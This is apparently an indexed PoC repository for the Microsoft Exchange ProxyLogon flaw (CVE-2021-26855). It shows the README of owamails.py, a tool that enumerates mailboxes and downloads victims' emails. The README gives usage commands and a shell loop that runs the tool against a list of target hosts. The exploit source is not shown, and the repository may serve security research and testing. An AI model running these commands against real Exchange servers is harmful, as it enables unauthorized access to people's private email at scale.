CVE-2021-26855 PoC — Microsoft Exchange Server Remote Code Execution Vulnerability

Associated Vulnerability
Title: Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)
Description: Microsoft Exchange Server Remote Code Execution Vulnerability
Readme
**Basic usage: `python owamails.py -u <url> -l <users.txt> -p <path>`**

**optional arguments:**
```
  -h, --help            show this help message and exit
  -u URL, --url URL     Url, provide schema and not final / (eg
                        https://example.org)
  -l LIST, --list LIST  Users mailbox list
  -p PATH, --path PATH  Path to write emails in xml format
  -f FQDN, --fqdn FQDN  FQDN
  -d DOMAIN, --domain DOMAIN
                        Domain to check mailboxes (eg if .local dont work)
```




**Check email boxes and download emails**

Basic:

`python owamails.py -u https://127.0.0.1 -l users.txt -p downloads`

Set the domain with `-d` instead of taking it from the headers:

`python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -d mydomain.local`

Set the FQDN with `-f` instead of taking it from the headers:

`python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -f EXCH01`


Multiple hosts:

`for i in $(cat targets.txt); do echo $i && python3 owamails.py -u https://$i -l users.txt -p emails; done;`

**References:**
- https://docs.microsoft.com/en-us/exchange/client-developer/exchange-web-services/how-to-work-with-exchange-mailbox-items-by-using-ews-in-exchange
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
- https://www.praetorian.com/blog/reproducing-proxylogon-exploit/

**Forked from:**  
https://gitlab.com/gvillegas/ohwaa/
File Snapshot

```
[4.0K]  /data/pocs/b90ec378312342f8227d111aa2f8d7767bcdf475
├── [9.4K]  owamails.py
├── [1.3K]  README.md
└── [ 115]  users.txt

0 directories, 3 files
```